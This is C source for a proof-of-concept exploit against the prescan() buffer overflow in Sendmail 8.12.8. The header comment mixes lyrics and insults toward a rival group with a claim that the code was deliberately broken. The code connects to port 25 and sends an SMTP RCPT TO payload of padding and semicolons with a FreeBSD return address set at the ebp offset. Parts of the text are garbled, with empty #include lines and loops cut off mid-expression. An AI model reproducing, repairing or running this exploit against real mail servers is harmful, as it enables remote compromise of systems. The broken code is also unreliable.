/*
* Sendmail 8.12.8 prescan() PROOF OF CONCEPT exploit by bysin
* And no i'm not in l33tsecurity
*
* AND I'M NOT GOBBLES!
*
* --
* my reflection, dirty mirror
* there's no connection to myself
* i'm your lover. i'm your zero
* i'm the face in your dreams of glass
* so save your prayers for when we're really gonna need 'em
* throw out your cares and fly
* wanna go for a ride?
* --
*
* This exploit is proof of concept, It has been edited ***NOT*** to work.
* This is to prove that the bug in sendmail 8.12.8 and below is vulnerable.
* On successful POC exploitation the program should crash with the following:
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x5c5c5c5c in ?? ()
*
* Alright so the last sendmail exploit wasnt very good, dont blame me
* it wasnt exploitable cause of that god damn second buffer kept
* getting in the way. Fuck it.
*
* This would not work on linux cause the offset for addr was someshit like
* 0xbfffb9c9 and sendmail doesnt allow certain characters like 0xff to be
* written to the buffer. Bsd on the other hand has an offset of someshit like
* 0xbfbfdad1, which is fine.
* {"Red Hat 7.3",88,120,0xbfffb9c9} // wont work :(
*
* And fuck you PHC you no talent bunch of fucking script kiddies. You'll
* fucking shit your pants when you see a real hacker in action. No I dont
* rip code, but you bitchs cant tell a piece of code from an apple pie,
* so shut the fuck up.
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
struct arch {
	char *os;           // Human-readable label for the target OS/version
	int pos;            // Position of ebp in the stack, with the last byte being 0x00
	int apos;           // Number of bytes after pvpbuf at which ebp is located
	unsigned long addr; // Pointer to the addr buffer
} archs[] = {
	{ .os = "FreeBSD 4.7-RELEASE", .pos = 180, .apos = 28, .addr = 0xbfbfdad1 },
};
/* Number of entries in archs[]; kept as a separate global because main() reads it. */
int maxarch = 1;
/////////////////////////////////////////////////////////
#define BUFSIZE 50096
/* Print the program banner followed by a blank line to stdout. */
void header(void) {
	fputs("Sendmail 8.12.8 prescan() exploit by bysin\n\n", stdout);
}
void printtargets() {
unsigned long i;
header();
printf("\t Target\t Addr\t\t OS\n");
printf("\t-------------------------------------------\n");
for (i=0;i \n",argv[0]);
printtargets();
return 0;
}
target=atol(argv[2]);
if (target < 0 || target >= maxarch) {
printtargets();
return 0;
}
header();
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Unable to create socket\n");
exit(0);
}
server.sin_family = AF_INET;
server.sin_port = htons(25);
printf("Resolving address... ");
fflush(stdout);
if ((ipaddr = inet_addr(argv[1])) == -1) {
struct hostent *hostm;
if ((hostm=gethostbyname(argv[1])) == NULL) {
printf("Unable to resolve address\n");
exit(0);
}
memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
}
else server.sin_addr.s_addr = ipaddr;
memset(&(server.sin_zero), 0, 8);
printf("Address found\n");
printf("Connecting... ");
fflush(stdout);
if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) {
printf("Unable to connect\n");
exit(0);
}
printf("Connected\n");
printf("Sending exploit... \n");
fflush(stdout);
readsocket(sock,220);
writesocket(sock,"HELO yahoo.com\r\n");
readsocket(sock,250);
writesocket(sock,"MAIL FROM: \r\n");
readsocket(sock,250);
memset(buf,0,sizeof(buf));
strcpy(buf,"RCPT TO: ");
p=buf+strlen(buf);
for (i=1,j=0,m=0;i<1242;i++) {
if (!(i%256)) {
*p++=';';
j++;
}
else {
if (j < 4) *p++='A';
else {
if (m == archs[target].pos) pos=p;
//if (m > archs[target].pos) *p++='B'; else
*p++='A';
m++;
}
}
}
if (pos) memcpy(pos,(char*)&archs[target].addr,4);
*p++=';';
for (i=0;i |